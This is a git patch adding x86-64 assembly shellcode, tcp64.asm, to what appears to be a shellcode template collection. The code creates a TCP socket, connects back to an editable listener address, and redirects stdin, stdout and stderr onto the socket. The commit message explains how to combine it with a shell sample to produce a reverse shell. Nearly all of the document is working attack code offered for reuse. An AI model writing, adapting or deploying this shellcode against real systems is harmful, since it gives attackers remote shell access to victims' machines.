From 1418eaf3054967f1d9856279f1988279c1009ba1 Mon Sep 17 00:00:00 2001
From: Malfurious <m@lfurio.us>
Date: Sun, 15 Jan 2023 09:29:14 -0500
Subject: shellcode: Add sample for connecting a TCP socket

This sample can be used to create a reverse shell when combined with the
shell64 sample:

    cat examples/{tcp64,shell64}.asm >code.asm
    make
    ...

Signed-off-by: Malfurious <m@lfurio.us>
---
 templates/shellcode/examples/tcp64.asm | 49 ++++++++++++++++++++++++++++++++++
 1 file changed, 49 insertions(+)
 create mode 100644 templates/shellcode/examples/tcp64.asm

diff --git a/templates/shellcode/examples/tcp64.asm b/templates/shellcode/examples/tcp64.asm
new file mode 100644
index 0000000..1ec3bc8
--- /dev/null
+++ b/templates/shellcode/examples/tcp64.asm
@@ -0,0 +1,49 @@
+; Based loosely on https://systemoverlord.com/2018/10/30/understanding-shellcode-the-reverse-shell.html
+
+; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
+xor     rax, rax
+xor     rdi, rdi
+xor     rsi, rsi
+xor     rdx, rdx
+mov      al, 41
+mov     dil, 2
+mov     sil, 1
+syscall
+
+; !! Edit this section to connect back to your listener !!
+;
+; struct sockaddr_in {                  // Struct size: 16
+;   short int           sin_family;     // AF_INET (2)
+;   unsigned short int  sin_port;       // Set to 8080 below
+;   struct in_addr      sin_addr;       // Set to 127.0.0.1 below
+;   unsigned char       sin_zero[8];
+; };
+;
+; struct in_addr {                      // Struct size: 4
+;   uint32_t s_addr;
+; };
+xor     rbx, rbx
+push    rbx
+mov     rbx, 0x0100007f901f0002
+push    rbx
+
+; connect(fd, sockaddr, sizeof sockaddr)
+mov     rdi, rax
+mov     rsi, rsp
+mov      dl, 16
+xor     rax, rax
+mov      al, 42
+syscall
+
+; dup2(fd, stdin)
+; dup2(fd, stdout)
+; dup2(fd, stderr)
+xor     rsi, rsi
+mov      al, 33
+syscall
+mov     sil, 1
+mov      al, 33
+syscall
+mov     sil, 2
+mov      al, 33
+syscall
-- 
cgit v1.2.3